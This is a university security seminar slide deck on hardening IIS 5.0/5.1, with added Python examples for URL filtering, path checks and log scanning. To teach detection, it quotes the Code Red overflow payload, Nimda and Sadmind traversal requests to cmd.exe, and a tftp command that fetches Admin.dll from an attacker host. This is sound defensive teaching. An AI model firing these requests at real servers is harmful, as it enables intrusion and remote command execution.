Title: IIS 5.0/5.1 Security
Slide 1: IIS 5.0/5.1 Security
- Laurie Walters
- Lxm30_at_psu.edu
- Security Operations and Services
- A Unit of Information Technology Services
Slide 2: IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Configuration files
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
Slide 3: Installing IIS
- IIS patches must be applied before the machine is networked!
- It is better to install IIS after the operating system is secured than while initially setting up the OS.
- Add / Remove Programs → Add / Remove Windows Components
Slide 4: IIS Installation
- By default, the following are installed:
  - Common Files
  - Documentation
  - FrontPage 2000 Server Extensions
  - IIS Snap-In
  - SMTP Service
  - WWW Service
- Do not install Documentation on a production web server.
- If you are not using Form Mail, do not install the SMTP service.
Slide 5: IIS Installation
- The following are not installed by default:
  - FTP Service
  - Scripts virtual directory
- Do not install these unless absolutely necessary.
Slide 6: IIS Installation
- Adds the Internet Information Services snap-in (ISM) and the Server Extensions Administrator snap-in to Administrative Tools.
- Adds accounts:
  - IUSR_MACHINENAME: built-in account for anonymous IIS access
  - IWAM_MACHINENAME: built-in account for out-of-process access
Slide 7: Uninstallation of IIS
- The following aren't uninstalled:
  - \Inetpub
  - \Systemroot\Help\iishelp
  - \Systemroot\system32\inetsrv
- The following users are not removed:
  - IUSR_Machinename
  - IWAM_Machinename
Slide 8: IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing UP IIS Metabase
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
Slide 9: Backing Up IIS Metabase
- The IIS Metabase is similar to the Windows registry. It stores configuration entries for IIS.
- The Metabase can become corrupted, so it should be backed up every time a change is made to IIS.
Slide 10: Backing Up IIS Metabase
- To back up the Metabase, in the ISM, right-click on your server icon and select Backup/Restore Configuration.
- Click on Create Backup and enter a meaningful name.
Slide 11: IIS Security Seminar Objectives
- IIS Security
- Backing Up IIS Metabase
- Installation of IIS
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
Slide 12: Ways to Overcome Common IIS Breaches Other Than Patching
- Patching prevents current vulnerabilities
Slide 13: Other means than patching help secure against future vulnerabilities
- Always install IIS on NTFS-formatted drives
- Install IIS on a separate hard drive or
- Do not allow Everyone or the IUSR account to run .exe (e.g. cmd.exe) commands
- Use the URLScan and IIS Lockdown tools
- Follow suggested SOS guidelines for securing the OS and IIS
Slide 14: IIS Lockdown Tool
- http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/Tools/locktool.asp
- Turns off unnecessary services and features of IIS.
Slide 15: URLScan
- Part of the IIS Lockdown tool. It also turns off unneeded features and restricts the type of HTTP requests that the server can process.
- Execute the following command:
  - iislockd.exe /q /c /t:c:\lockdown_files
- It will install urlscan.exe to this folder.
- Run urlscan.exe to install it.
Slide 16: What can be filtered with URLScan
- Request method (verb), e.g. GET, HEAD, POST, etc.
- File extension of the resource requested
- Suspicious URL encoding
- Presence of non-ASCII characters in the URL
- Presence of specified character sequences in the URL
- Presence of specified headers in the request
Slide 17: Additional abilities of URLScan 2.5
- Ability to change the log file directory
- Ability to log long URLs
- Ability to restrict the size of requests
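The filtering that slides 16 and 17 list can be expressed as a small request filter, which makes it clear what each check catches. The Python below is an added example written for this page; it is not URLScan's code and not from the seminar. The policy values (allowed verbs, denied extensions and sequences, denied headers, size limits) are constructed for illustration and are not URLScan's shipped defaults; the function and policy names are assumptions.

```python
from urllib.parse import unquote

# Constructed policy modelled on the kinds of settings URLScan exposes (verb
# allow-list, denied extensions, denied URL sequences, denied headers, size
# limits). The values are illustrative, not URLScan's shipped defaults.
POLICY = {
    "allow_verbs": {"GET", "HEAD", "POST"},
    # slide 20's script mappings plus the executables the worm slides single out
    "deny_extensions": {".ida", ".idq", ".htw", ".htr", ".printer", ".idc",
                        ".stm", ".shtm", ".shtml", ".exe", ".bat", ".cmd", ".dll"},
    "deny_sequences": ["..", "./", "\\", ":", "%"],
    "deny_headers": {"translate", "if", "lock-token"},
    "max_url_length": 260,
    "max_header_length": 256,
}


def extension_of(url):
    """Extension of the requested resource, after one level of decoding."""
    path = unquote(url.split("?", 1)[0])
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return ("." + name.rsplit(".", 1)[1]).lower() if "." in name else ""


def is_double_encoded(url):
    """True when a second decode still changes the URL, e.g. %255c -> %5c -> \\ ."""
    once = unquote(url)
    return unquote(once) != once


def check_request(method, url, headers=None, policy=POLICY):
    """Return the list of policy violations; an empty list means the request passes."""
    headers = headers or {}
    reasons = []
    if method.upper() not in policy["allow_verbs"]:
        reasons.append(f"verb {method} not allowed")
    if len(url) > policy["max_url_length"]:
        reasons.append("URL exceeds maximum length")
    if any(ord(ch) > 127 for ch in url):           # the \xc0\xaf / \xc1\x1c family
        reasons.append("non-ASCII character in URL")
    if is_double_encoded(url):
        reasons.append("double-encoded sequence in URL")
    decoded = unquote(url)                          # sequences are checked after one decode,
    for seq in policy["deny_sequences"]:            # so ..%5c.. is seen as ..\..
        if seq in decoded:
            reasons.append(f"denied sequence {seq!r}")
    ext = extension_of(url)
    if ext in policy["deny_extensions"]:
        reasons.append(f"denied extension {ext}")
    for name, value in headers.items():
        if name.lower() in policy["deny_headers"]:
            reasons.append(f"denied header {name}")
        if len(value) > policy["max_header_length"]:
            reasons.append(f"header {name} exceeds maximum length")
    return reasons


if __name__ == "__main__":
    for method, url in [("GET", "/files/the%20name%20of%20the%20file.txt"),
                        ("GET", "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir"),
                        ("GET", "/default.ida?NNNN%u9090%u6858")]:
        print(method, url, "->", check_request(method, url) or "allowed")
```

The order of the checks matters: the double-encoding test runs on the raw URL, the sequence test on the once-decoded URL, and the extension test on the decoded path, so an attacker cannot pick an encoding layer that one check sees and another misses. The `%u` form that Code Red uses is not a valid percent-escape, so it survives decoding and is caught by the `%` sequence rule.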
Slide 18: Securing IIS Manually
- Change permissions on vital files:
  - cacls %systemroot%\*.exe /T /G System:F Administrators:F
  - Also change the permission for the file command.com
- Do not use the Default Web Site
- Stop the Administrative Web Site
- Remove IIS Samples and Documentation
- Group all static content separately from scripts, executables, etc.
- Remove unnecessary script mappings
Slide 19: Make sure you have the correct version of MDAC
- MDAC provides the underlying functionality for database operations, like connecting to remote databases and returning data to a client.
- Heap overflow vulnerability in versions 2.6 and lower.
- If you do not need MDAC, remove this virtual directory from your system.
Slide 20: Removing Unnecessary Script Mappings
- .ida, .idq: Index Services
- .htr: web-based Windows password reset
- .printer: Internet Printing Protocol
- .stm, .shtm, .shtml: server-side includes
- .idc: database applications
Slide 21: Disabling Parent Paths
- Parent Paths allow you to use relative file path names (../directory/file.html instead of c:/directory/file.html).
- The vulnerability in Parent Paths is that they can be exploited to move in reverse through the file structure to get to the root of C:/.
- Then one can traverse to known file locations that are:
  - more permissive (e.g. C:\wwwroot\inetpub\scripts), or
  - contain goodies (e.g. C:\winnt\system32)
Slide 22: You can disable parent paths and still use relative pathnames
- Note: It is possible to use relative pathnames with some effort.
- (e.g. if your IIS data folder is in a different folder than your database and you don't want to use absolute pathnames for everything).
- You have to use some coding to make a variable for the absolute pathname and use it to implement relative pathnames.
- http://www.windowswebsolutions.com/Articles/Index.cfm?ArticleID=23278
Slide 23: Demonstrations
- Manually securing IIS
- IIS Lockdown Tool
Slide 24: IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Metabase
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
Slide 25: IIS Authentication
- To set the means of IIS authentication, right-click on your web site and select Properties, then choose the Directory Security tab. Click on the Edit button next to "Anonymous access and authentication control".
- Anonymous: uses IUSR_Machinename to anonymously access the site
- Integrated Windows: users connect to the machine with a Windows username and password
- Basic: authenticates to the machine using an unencrypted username / password (user accounts must have "log on locally" rights)
- Digest: authentication within a W2K domain; password hashes are compared against DC hashes
- Kerberos: authenticate to a K4 or K5 domain
Slide 26: IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Metabase
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
Slide 27: FTP and SMTP
- Disable SMTP and FTP if not needed; if absolutely needed, limit access by userid/password or IP address
- Use other means than FTP if possible (WebDAV, Terminal Services, etc.)
- Allowing totally anonymous connections to the machine is a bad idea.
- Specify the directory where users can upload/download files.
- Create appropriate permissions on files in this directory (e.g. remote users can read but not write or execute files).
Slide 28: IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Metabase
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
Slide 29: IIS Logging
- Enable extended logging properties in IIS Manager
- W3C Extended Log Format instead of Active Log
- Make sure Date, Time, Server IP, Client IP, URI Stem and URI Query are checked
- Daily logs are kept in UTC (GMT) format in the following location: C:\Windows\System32\Logfiles\W3SVC1\ex020930.txt
- Check the box "Use local time for file naming and rollover" so that logs are kept in EST/EDT instead of GMT.
Slide 30: IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Configuration files
- Authentication
- FTP and SMTP
- Securing IIS manually and with IIS Lockdown tool
- Logging
- Common IIS Breaches and how to prevent them
Slide 31: Common IIS Breaches
- Buffer Overflows (XXXXXXXXXXXXXXX code)
- Directory Traversal (../../../c:winnt/system32/cmd.exe)
- Canonicalization
- Request unusual action using cmd.exe, .bat
- Encoded using an alternate character set (e.g. Unicode) or include character sequences that are rarely seen in legitimate requests.
- All of the above were used for recent worms (e.g. IIS/Sadmind, Code Red, Code Red 2, Nimda)
Slide 32: Buffer Overflows
- Programs don't check input for appropriate length.
- Extra input above and beyond the maximum length gets attached to the CPU execution stack.
- Attackers must carefully program B.O. code to identify the location where it is added to the stack, so that they can return to this location and execute the arbitrary input.
Slide 33: Problem with Buffer Overflows in IIS
- The IIS process runs in the context of the SYSTEM account.
- When a buffer overflow is leveraged against IIS, arbitrary commands can be run in the context of the SYSTEM user.
Slide 34: Canonicalization
- Various file names are equivalent
  - E.g. c:\directory\file.html, file.html, and ..\..\file.html may all refer to the same file
- When some non-static file types are requested via a malformed URL, the canonicalization locates the correct file, but mixes up the actual location of the file.
- Since it determines the file is in a different folder than it actually is, it applies incorrect permissions.
Slide 35: Problem with Canonicalization
- A file in a folder with restricted permissions would be requested; however, the permissions granted would be those of the file's ancestors rather than the actual file permissions.
- If the parent permissions are less restrictive, the attacker could get extra privileges for the file.
Slide 36: Directory Traversal (Dot Dot Slash)
- Results from inadequate NTFS ACLs on the directory or files in question.
- http://www.iistestbox.com/../../../../../winnt/system32/cmd.exe
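The canonicalization and traversal problems on slides 21, 34, 35 and 36 come down to one check done in the right order: decode the request, resolve it to a canonical disk path, and only then decide whether it lies under the web root and which ACL applies. The Python below is an added example written for this page; it is not IIS's code and not from the seminar. WEB_ROOT and the sample URLs are constructed, the function name is an assumption, and the URL is decoded twice to model the worst case slide 38 describes.

```python
import ntpath
from urllib.parse import unquote

# Constructed web root; the slides use the default Inetpub layout.
WEB_ROOT = r"C:\Inetpub\wwwroot"


def canonical_disk_path(web_root, url, parent_paths=False):
    """Map a request URL to the canonical disk path it names, or None if it
    must be refused.

    The URL is decoded twice to model the worst case from slide 38 (%255c ->
    %5c -> \\), slashes are folded to the Windows form, and ntpath.normpath
    collapses every '..' before the result is compared with the web root.
    Refusing paths that resolve outside the root is the step the
    canonicalization bugs on slides 34 and 35 get wrong; with
    parent_paths=False any '..' segment is refused outright, which is the
    effect of disabling Parent Paths (slide 21).
    """
    decoded = unquote(unquote(url.split("?", 1)[0]))
    rel = decoded.replace("/", "\\").lstrip("\\")
    if not parent_paths and ".." in rel.split("\\"):
        return None
    root = ntpath.normpath(web_root).rstrip("\\")
    full = ntpath.normpath(ntpath.join(root, rel))
    inside = full.lower() == root.lower() or full.lower().startswith(root.lower() + "\\")
    return full if inside else None


if __name__ == "__main__":
    for u in ["/default.htm",
              "/files/the%20name%20of%20the%20file.txt",
              "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
              "/../../../../../winnt/system32/cmd.exe",
              "/scripts/../default.htm"]:
        print(f"{u:55} parent_paths=on  -> {canonical_disk_path(WEB_ROOT, u, True)}")
        print(f"{u:55} parent_paths=off -> {canonical_disk_path(WEB_ROOT, u)}")
```

Note that the comparison is made on the normalized path, never on the raw URL: a `..` that stays inside the root (`/scripts/../default.htm`) is harmless when Parent Paths are allowed, while every `..%5c`, `..%255c` and `..\` spelling on the worm slides collapses to a path under `C:\winnt` and is refused. Running the check on Linux works because `ntpath` implements Windows path rules independently of the host OS.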
Slide 37: Examples of Unicode and Hex Encoding URLs
- Unicode example: Arabic letters
- Hexadecimal examples:
  - Space: %20
  - Plus: %2B
  - Period: %2E
  - /: %2F
  - Colon: %3A
  - ?: %3F
  - \: %5C
  - %: %25
Slide 38: Hexadecimal use
- Good use of hexadecimal:
  - http://www.iistestbox.com/files/the%20name%20of%20the%20file.txt
- Bad use of hexadecimal:
  - http://www.iistestbox.com/..%2F..%2Fwinnt/file.txt
- Double decoding of hex:
  - IIS performs two decodes of HTTP requests that traverse executable directories
  - %255c
    - 1st decode: %5c
    - 2nd decode: \
Slide 39: IIS Sadmind Worm
- 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200
- 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200
- 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502
- GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -
Slide 40: Effects of IIS / Sadmind
- The sadmind/IIS worm exploited a vulnerability in Solaris systems. The Solaris worm created a root shell on the infected host and automatically attacked other vulnerable Solaris systems.
- It subsequently installed software to attack and deface Microsoft IIS web servers.
Slide 41: Ways to Protect Against IIS Sadmind
- Microsoft Patch MS00-078 to prevent canonicalization
- Disable Parent Paths
- Restrict access to cmd.exe so that it can't be used by the worm
Slide 42: .printer Buffer Overflow (jill.c)
- .printer: web-based control of networked printers
- GET /NULL.printer HTTP/1.0
- Host: [420-character buffer]
- Instead of crashing, IIS automatically restarts itself due to redundancy
- Jill exploits the .printer B.O. vulnerability to create a remote shell, where the attacker can enter any command at the following prompt:
  - C:\WINNT\System32>
Slide 43: Ways to protect against Jill B.O.
- Microsoft Patch MS01-023
- If not using IPP:
  - Unmap the .printer DLL file extension in IIS so that it is not loaded on IIS startup.
  - Or, you could delete the file C:\Winnt\System32\msw3prt.dll, which is the actual file that the .printer extension points to.
Slide 44: .ida/.idq Buffer Overflow
- .ida provides support for administrative scripts
- .idq provides support for Internet data queries (Indexing Services)
- The .ida/.idq B.O. works by using .ida to send a too-long variable to idq.dll
- GET /null.ida?[240-character buffer of X] HTTP/1.1
- The IIS process is halted before this even reaches the Index service, and restarts IIS
Slide 45: Code Red 1 Worm (Another .ida/.idq worm)
- /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
Slide 46: Effects of Code Red 1
- A machine infected with Code Red 1 scans random IP addresses on port 80/TCP looking for other hosts to infect.
- Code Red 1 is stored in memory (when the machine reboots, the worm no longer performs scans).
- Web pages on Code Red 1-infected machines may be defaced with the following message:
  - HELLO! Welcome to http://www.worm.com! Hacked By Chinese!
Slide 47: Ways to Protect Against Code Red 1
- Microsoft Cumulative Patch MS02-062 (original patch MS01-033)
- If not using Indexing Services, remove the application mapping for .ida and .idq
- Install URLScan to deny any request with hexadecimal
Slide 48: Code Red 2
- GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
Slide 49: Effects of Code Red 2
- After a successful .ida/.idq B.O., CR2 creates threads to scan for new hosts to infect for the next 24 hours.
- Unlike Code Red I, CR2 is not only memory-resident.
- CR2 then copies cmd.exe to the file root.exe in the publicly accessible IIS scripts and MSADC folders (an intruder may then execute arbitrary commands with the privileges of the IIS server process).
Slide 50: CR2 Contains a Backdoor Trojan
- A Trojan horse copy of explorer.exe is created with CR2 and copied to C:\ and D:\.
- The Trojan horse explorer.exe calls the real explorer.exe to mask its existence, and creates a virtual mapping which exposes the C and D drives.
- On systems not patched against the "Relative Shell Path" vulnerability, this Trojan horse copy of explorer.exe will run every time a user logs in.
Slide 51: Ways to Protect Against CR2
- Microsoft Cumulative Patch MS02-062
- If not using Indexing Services, remove the application mapping for .ida and .idq
- Install URLScan to deny any request with hexadecimal
- Restrict access to cmd.exe so that it can't be used by the worm
- Protect against the "Relative Shell Path" vulnerability: Microsoft Patch MS02-052
Slide 52: Nimda Worm
- The Nimda worm is sent with an attachment
  - pretends to have an "audio/x-wav" content-type
  - (really an executable file)
- If executed, it infects the host, causing various files to be replaced with infected copies.
- The worm sends itself out by email, searches for open network shares, attempts to copy itself to unpatched or vulnerable Microsoft IIS web servers, and is a virus infecting both local files and files on remote network shares.
Slide 53: Nimda
- GET /scripts/root.exe?/c+dir
- GET /MSADC/root.exe?/c+dir
- GET /c/winnt/system32/cmd.exe?/c+dir
- GET /d/winnt/system32/cmd.exe?/c+dir
- GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
- GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
- GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
- GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
- GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
- GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
- GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
- GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
- GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
- GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
- GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
- GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
- Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.
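The request patterns on slides 39 and 53 are most useful turned into a detection that runs over the W3C Extended logs slide 29 tells you to enable, so the same scan covers the Code Red II backdoor probes, the traversal variants, the .ida/.idq overflow and the Nimda tftp fetch from slide 55. The Python below is an added example written for this page, not the seminar's or Microsoft's code; the log excerpt, IP addresses and timestamps are constructed, and the tag names and function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample in W3C Extended format with the fields slide 29 asks for
# (date, time, client IP, server IP, URI stem, URI query) plus the status code.
# Timestamps are UTC, as IIS writes them in this format; the IPs are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-18 12:00:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 12:00:01 10.10.10.10 - 10.20.20.20 80 GET /default.htm - 200
2001-09-18 12:00:02 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+dir 404
2001-09-18 12:00:03 10.10.10.10 - 10.20.20.20 80 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 12:00:04 10.10.10.10 - 10.20.20.20 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 12:00:05 10.10.10.10 - 10.20.20.20 80 GET /_vti_bin/..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 12:00:06 10.10.10.10 - 10.20.20.20 80 GET /default.ida XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 404
2001-09-18 12:00:07 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+tftp%20-i%2010.10.10.10%20GET%20Admin.dll%20d:\\Admin.dll 200
2001-09-18 12:00:08 10.10.10.10 - 10.20.20.20 80 GET /files/the%20name%20of%20the%20file.txt - 200
"""

# Slide 53: root.exe in /scripts and /msadc, and the /c and /d mappings, are the
# backdoor Code Red II leaves behind.
CR2_BACKDOOR = re.compile(r"^/(scripts|msadc)/root\.exe$|^/[cd]/winnt/system32/cmd\.exe$")


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip():
            continue
        parts = raw.split()
        if fields is None or len(parts) != len(fields):
            continue  # no header yet or malformed record: skip rather than mis-assign columns
        yield dict(zip(fields, parts))


def normalize(url):
    """Decode twice (the %255c -> %5c -> \\ case from slide 38), fold backslashes
    to slashes and lower-case, so every traversal spelling collapses to one form."""
    return unquote(unquote(url)).replace("\\", "/").lower()


def classify(rec):
    """Return the list of patterns a record matches (empty for ordinary traffic)."""
    stem = normalize(rec["cs-uri-stem"])
    query = normalize(rec.get("cs-uri-query", "-"))
    tags = []
    if CR2_BACKDOOR.match(stem):
        tags.append("cr2-backdoor-probe")
    if "/../" in stem:
        tags.append("directory-traversal")
    if stem.endswith((".ida", ".idq")) and ("%u" in query or len(query) > 100):
        tags.append("ida-idq-overflow")
    if stem.endswith(".printer"):
        tags.append("printer-mapping-request")
    if "tftp" in query and "admin.dll" in query:
        tags.append("nimda-admin-dll-fetch")
    return tags


def scan_log(text):
    """Return (time, client IP, URI stem, tags, status) for each suspicious record.
    A 2xx status on a flagged request means the command actually ran (slide 55)."""
    hits = []
    for rec in parse_w3c(text):
        tags = classify(rec)
        if tags:
            hits.append((rec["time"], rec["c-ip"], rec["cs-uri-stem"], tags, rec["sc-status"]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Two things worth keeping in mind when running this against real files: the record times in W3C Extended format are UTC even when "Use local time for file naming and rollover" is checked (that option only changes which day's file a record lands in), and a 404 on a backdoor probe means the host was scanned but was not carrying the Code Red II files, while a 200 on a traversal or tftp request is the case to treat as a compromise.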
Slide 54: Nimda on IIS Server
- Nimda attempts to install an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the file name Admin.dll may be legitimately installed by IIS in other directories.)
- It then scans other systems on port 80, attempting to infect them with Nimda
Slide 55: Nimda Backdoor
- Attackers send the string /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll to attempt to connect to infected systems.
- A return code of 200 indicates success of this command.
Slide 56: Ways to Protect Against Nimda (Email Portion)
- Microsoft Patch for automatic execution of previewed files in Outlook (MS01-020)
- Do not open attachments without verification
- Protect against open network shares
Slide 57: Ways to Protect Against Nimda (IIS Portion)
- Microsoft Cumulative Patch MS02-062 (protects against both means of Nimda IIS infection: the Code Red 2 backdoor and Directory Traversal)
- If not using Indexing Services, remove the application mapping for .ida and .idq
- Install URLScan to deny any request with hexadecimal
- Restrict access to cmd.exe so that it can't be used by the worm
- Protect against the "Relative Shell Path" vulnerability of explorer.exe: Microsoft Patch MS02-052
- Disable Parent Paths
Slide 58: IIS Security Seminar Objectives
- Installation of IIS
- Backing Up IIS Configuration files
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
Slide 59: In Conclusion
- IIS is a big target for skilled hackers as well as script kiddies.
- Staying current on patches will help prevent your IIS box from being broken into; however, proper locking down will also be highly effective against future vulnerabilities.
Slide 60: Microsoft Security Guides
- Microsoft Guide to Securing IIS 5
  - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/iis/tips/iis5chk.asp
- Microsoft Guide to Securing Windows 2000
  - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/prodtech/windows/secwin2k/default.asp
Slide 61: Slides and Recommended Guidelines
- Today's slides, recommended guidelines for IIS, Windows 2000 and XP, links to security tools and further reading
- http://www.personal.psu.edu/lxm30/windows/windows.html